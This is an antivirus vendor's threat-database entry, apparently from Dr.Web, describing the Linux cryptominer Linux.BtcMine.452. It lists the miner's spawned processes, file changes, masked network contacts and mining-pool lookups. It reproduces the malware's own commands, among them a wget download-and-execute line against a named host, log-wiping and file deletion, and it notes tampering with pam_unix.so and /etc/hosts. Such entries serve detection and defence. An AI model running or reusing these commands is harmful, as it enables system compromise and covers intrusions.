Para el funcionamiento correcto del sitio web, debe activar el soporte de JavaScript en su navegador.
Linux.BtcMine.452
Added to the Dr.Web virus database:
2020-10-11
Virus description added:
2020-10-10
Technical Information
Malicious functions:
Launches itself as a daemon
Launches processes:
sh -c md5sum /usr/bin/pamdicks
md5sum /usr/bin/pamdicks
sh -c wget -c http://a.powerofwish.com/up-sugar -O /var/lib/up && chmod 755 /var/lib/up && /var/lib/up
wget -c http://a.powerofwish.com/up-sugar -O /var/lib/up
chmod 755 /var/lib/up
/var/lib/up
sh -c rm -f /usr/bin/pamdicks 1> /dev/null 2>&1
rm -f /usr/bin/pamdicks
sh -c rm -f /usr/bin/pamdicks.org 1> /dev/null 2>&1
rm -f /usr/bin/pamdicks.org
sh -c rm -f /usr/bin/pamdicks.org1 1> /dev/null 2>&1
rm -f /usr/bin/pamdicks.org1
sh -c rm -f /usr/bin/pamdicks.org2 1> /dev/null 2>&1
rm -f /usr/bin/pamdicks.org2
sh -c rm -rf /tmp/up 1> /dev/null 2>&1
rm -rf /tmp/up
sh -c rm -rf /var/lib//up 1> /dev/null 2>&1
rm -rf /var/lib//up
sh -c /usr/bin/pamdicks
/usr/bin/pamdicks
sh -c rm -f /etc/hosts.old
rm -f /etc/hosts.old
sh -c echo > /var/log/messages
sh -c rm -rf /tmp/chkmem 1> /dev/null 2>&1
rm -rf /tmp/chkmem
sh -c rm -rf /var/lib/chkmem 1> /dev/null 2>&1
rm -rf /var/lib/chkmem
Performs operations with the file system:
Modifies file access rights:
/var/lib/up
/usr/bin/pamdicks
/usr/bin/pamdicks.org
/usr/bin/pamdicks.org1
/usr/bin/pamdicks.org2
Creates or modifies files:
/var/lib/up
/usr/bin/pamdicks
/usr/bin/pamdicks.org
/usr/bin/pamdicks.org1
/usr/bin/pamdicks.org2
/etc/hosts
/lib/x86_64-linux-gnu/security/pam_unix.so
/var/run/bioset
/run/bioset
/var/log/messages
Deletes files:
/usr/bin/pamdicks
/usr/bin/pamdicks.org
/usr/bin/pamdicks.org1
/usr/bin/pamdicks.org2
/tmp/up
/var/lib//up
/etc/hosts.old
/tmp/chkmem
/var/lib/chkmem
Network activity:
Establishes connection:
<LOCAL_DNS_SERVER>
[2#######0:3036::ac43:d2fb]:0
[2#######0:3036::681b:8039]:0
[2#######0:3035::681b:8139]:0
10#.#7.129.57:0
10#.#7.128.57:0
17#.##.210.251:0
39.###.233.58:3366
HTTP GET requests:
a.######fwish.com/up-sugar
DNS ASK:
a.####rofwish.com
po##.##uminerpool.com
su###.ss.dxpool.com
Sends data to the following servers:
Receives data from the following servers:
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Descargue Dr.Web para Android
Gratis por 3 meses
Todos los componentes de protección
Renovación de la demo a través de AppGallery/Google Pay
Si Vd. continúa usando este sitio web, esto significa que Vd. acepta el uso de archivos Cookie y otras tecnologías para que recabemos las estadísticas sobre los visitantes. Más información
OK